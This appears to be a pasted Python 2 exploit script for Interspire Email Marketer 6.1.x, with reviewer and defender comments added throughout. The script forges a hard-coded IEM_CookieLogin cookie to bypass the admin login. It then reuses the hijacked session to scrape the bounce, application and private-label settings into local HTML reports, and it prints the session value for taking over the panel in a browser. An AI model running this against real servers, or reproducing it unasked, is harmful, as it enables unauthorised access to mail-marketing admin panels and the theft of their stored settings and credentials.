
s

a guest
Apr 9th, 2020
  1. # Grab Cookies IEM 6.1.x (IEM = Interspire Email Marketer)
  2. # Example Usage: python file.py http://site.com/mail/admin/index.php
  3.  
  4. import requests
  5. import sys
  6. from bs4 import BeautifulSoup
  7. from pprint import pprint
  8.  
  9.  
  10. def cookie_cutter(url):
          # Probe `url` for acceptance of a pre-built IEM_CookieLogin cookie.
          #
          # Flow: fetch `url` twice to obtain a session, add a hard-coded
          # IEM_CookieLogin cookie if a cookie whose name contains IEMSESSIONID
          # was issued, fetch again, and compare the two response bodies. If
          # they differ, the three *_info_grab helpers are run with the
          # IEMSESSIONID value and (IEMSESSIONID value, last response body) is
          # returned. On every other path the function falls off the end and
          # returns None.
          #
          # NOTE(review): body inequality is the only success test. Any page
          # content that changes between requests would satisfy it as well, so
          # a positive result from this script needs independent confirmation.
          #
          # Defender notes: no request headers are overridden here, so the
          # requests library's default python-requests User-Agent is sent, and
          # the IEM_CookieLogin value is a constant; both can be matched in
          # web-server or WAF logs. Remediation is the vendor release that
          # fixes IEM_CookieLogin handling (version not stated on this page).
  11.     with requests.Session() as s:
             # The first response is discarded; the second is the baseline body.
  12.        s.get(url)
  13.        r = s.get(url)
  14.        response_regex = r.text
  15.        print("requesting initial Cookie\n")
  16.        print(str(r.headers)+"\n")
  17.        
             # Only add the login cookie when the server issued a session cookie.
  18.        for key,value in s.cookies.items():
  19.            if key and "IEMSESSIONID" in key:
  20.          
                    # Fixed literal, not derived from the target; it looks like
                    # URL-encoded base64 (the trailing %3D is '=').
  21.               s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
  22.        print("Attempting To Posion 2nd request with Forged Cookie\n")
  23.        print("-" * 25)
  24.        r = s.get(url)
  25.        response_regex2 = r.text
             # Python 2 print statement: this file does not parse under Python 3.
  26.        print response_regex2
  27.        print(str(r.headers) + "\n")
  28.        if response_regex != response_regex2:
  29.  
  30.           for key,value in s.cookies.items():
  31.               if "IEMSESSIONID" in key:
                       # One try wraps all three helpers: the first exception
                       # skips the remaining calls and is silently dropped.
  32.                  try:
  33.                     #
  34.                     bounce_info_grab(url,value)
  35.                     app_info_grab(url,value)
  36.                     privt_info_grab(url,value)
  37.                  except:
  38.                      pass
                       # Returns on the first cookie whose name contains IEMSESSIONID.
  39.                  return value,r.text
  40.  
  41.  
  42. def bounce_info_grab(url,session_to_ride):
          # Fetch the Settings page (Tab=2) with the given IEMSESSIONID value
          # and save the element with id 'div7' to bounce_report.html.
          #
          # url: base URL; "?Page=Settings&Tab=2" is appended to it.
          # session_to_ride: value placed in the IEMSESSIONID cookie.
          #
          # presumably div7 holds bounce-handling settings (inferred from the
          # function and file names only) -- TODO confirm.
          #
          # Defender notes: a logged request for ?Page=Settings&Tab=2 from a
          # client that never submitted the login form is worth alerting on.
          # If such a request succeeded against an instance you operate, treat
          # whatever that settings page displays as disclosed and rotate any
          # credentials stored there (assumes it holds some -- confirm).
  43.     url_grab = url+"?Page=Settings&Tab=2"
  44.     print(url_grab)
  45.     with requests.Session() as s:
             # A fresh session: one request without the cookie, then one with it.
  46.        s.get(url_grab)
  47.        s.cookies.set('IEMSESSIONID',session_to_ride)
  48.        r = s.get(url_grab)
  49.        response_regex = r.text
  50.        soup = BeautifulSoup(response_regex,'html5lib')
             # find() gives None when no such div exists; "None" is then written
             # to the report and div.contents below raises AttributeError.
  51.        div = soup.find('div', id='div7')
  52.      
  53.        
             # Overwrites any existing file of this name in the working directory.
             # The remote markup is embedded unescaped, so opening the report in
             # a browser renders content controlled by the remote site.
  54.        outfile = open("bounce_report.html",'w')
  55.        dataout = """<html><head>Report</head><title>Report</title>
  56.                    <body>""" + str(div) +"""</body></html>"""
  57.        outfile.write(dataout)
  58.        outfile.close()
  59.        for divy in div.contents:
  60.            print(divy)
  61.          
  62. def app_info_grab(url,session_to_ride):
          # Fetch the Settings page (Tab=2) with the given IEMSESSIONID value
          # and save the element with id 'div1' to
          # application_settings_report.html.
          #
          # url: base URL; "?Page=Settings&Tab=2" is appended to it.
          # session_to_ride: value placed in the IEMSESSIONID cookie.
          #
          # Requests the same URL as bounce_info_grab and privt_info_grab; only
          # the div id and the output file name differ.
          # presumably div1 holds application settings (inferred from the
          # function and file names only) -- TODO confirm.
  63.     url_grab = url+"?Page=Settings&Tab=2"
  64.     print(url_grab)
  65.     with requests.Session() as s:
             # A fresh session: one request without the cookie, then one with it.
  66.        s.get(url_grab)
  67.        s.cookies.set('IEMSESSIONID',session_to_ride)
  68.        r = s.get(url_grab)
  69.        response_regex = r.text
  70.        soup = BeautifulSoup(response_regex,'html5lib')
             # find() gives None when no such div exists; "None" is then written
             # to the report and div.contents below raises AttributeError.
  71.        div = soup.find('div', id='div1')
  72.    
  73.        
             # Overwrites any existing file of this name in the working directory.
             # The remote markup is embedded unescaped, so opening the report in
             # a browser renders content controlled by the remote site.
  74.        outfile = open("application_settings_report.html",'w')
  75.        dataout = """<html><head>Report</head><title>Report</title>
  76.                    <body>""" + str(div) +"""</body></html>"""
  77.        outfile.write(dataout)
  78.        outfile.close()
  79.        for divy in div.contents:
  80.            print(divy)  
  81.    
  82. def privt_info_grab(url,session_to_ride):
          # Fetch the Settings page (Tab=2) with the given IEMSESSIONID value
          # and save the element with id 'div8' to privtlbl_settings_report.html.
          #
          # url: base URL; "?Page=Settings&Tab=2" is appended to it.
          # session_to_ride: value placed in the IEMSESSIONID cookie.
          #
          # Requests the same URL as bounce_info_grab and app_info_grab; only
          # the div id and the output file name differ.
          # presumably div8 holds private-label settings (inferred from the
          # "privtlbl" file name only) -- TODO confirm.
  83.     url_grab = url+"?Page=Settings&Tab=2"
  84.     print(url_grab)
  85.     with requests.Session() as s:
             # A fresh session: one request without the cookie, then one with it.
  86.        s.get(url_grab)
  87.        s.cookies.set('IEMSESSIONID',session_to_ride)
  88.        r = s.get(url_grab)
  89.        response_regex = r.text
  90.        soup = BeautifulSoup(response_regex,'html5lib')
             # find() gives None when no such div exists; "None" is then written
             # to the report and div.contents below raises AttributeError.
  91.        div = soup.find('div', id='div8')
  92.      
  93.        
             # Overwrites any existing file of this name in the working directory.
             # The remote markup is embedded unescaped, so opening the report in
             # a browser renders content controlled by the remote site.
  94.        outfile = open("privtlbl_settings_report.html",'w')
  95.        dataout = """<html><head>Report</head><title>Report</title>
  96.                    <body>""" + str(div) +"""</body></html>"""
  97.        outfile.write(dataout)
  98.        outfile.close()
  99.        for divy in div.contents:
  100.            print(divy)  
  101.    
  102. def main():
           # Entry point: read the target URL from argv[1], run cookie_cutter on
           # it, and print the IEMSESSIONID value it returns.
           #
           # The bare print statements below are Python 2 syntax; the file does
           # not parse under Python 3. "\033[92m" and "\033[91m" are ANSI colour
           # escapes (green and red).
           #
           # No argument check: a missing argv[1] raises IndexError on the next
           # line, outside the try block.
  103.     url = sys.argv[1]
  104.     print  "Target: " +url+ """ """+"\n"
  105.     print "-" * 25
  106.     try:
              # cookie_cutter returns None on its failure paths, so this tuple
              # unpacking raises TypeError and control moves to the except.
  107.        session_rider_value,content = cookie_cutter(url)
  108.        print "\033[92m Session Has Been Generated"+"\n"
  109.        print "-" * 25
  110.        print "\033[92m Magic Cookie Generated! Modify Existing IEMSESSIONID Value In browser With Below Value"
  111.        print "-" * 25
  112.        print  session_rider_value+"\n"
  113.        print "-" * 25
  114.     except:
              # NOTE(review): reached for any exception (connection errors,
              # timeouts, the TypeError above), so this message is not evidence
              # that a host is patched.
  115.        print "\033[91m Target Is Not Vulnerable"
  116.        pass
  117.    
  118. main()  # no __main__ guard: importing this module also runs main()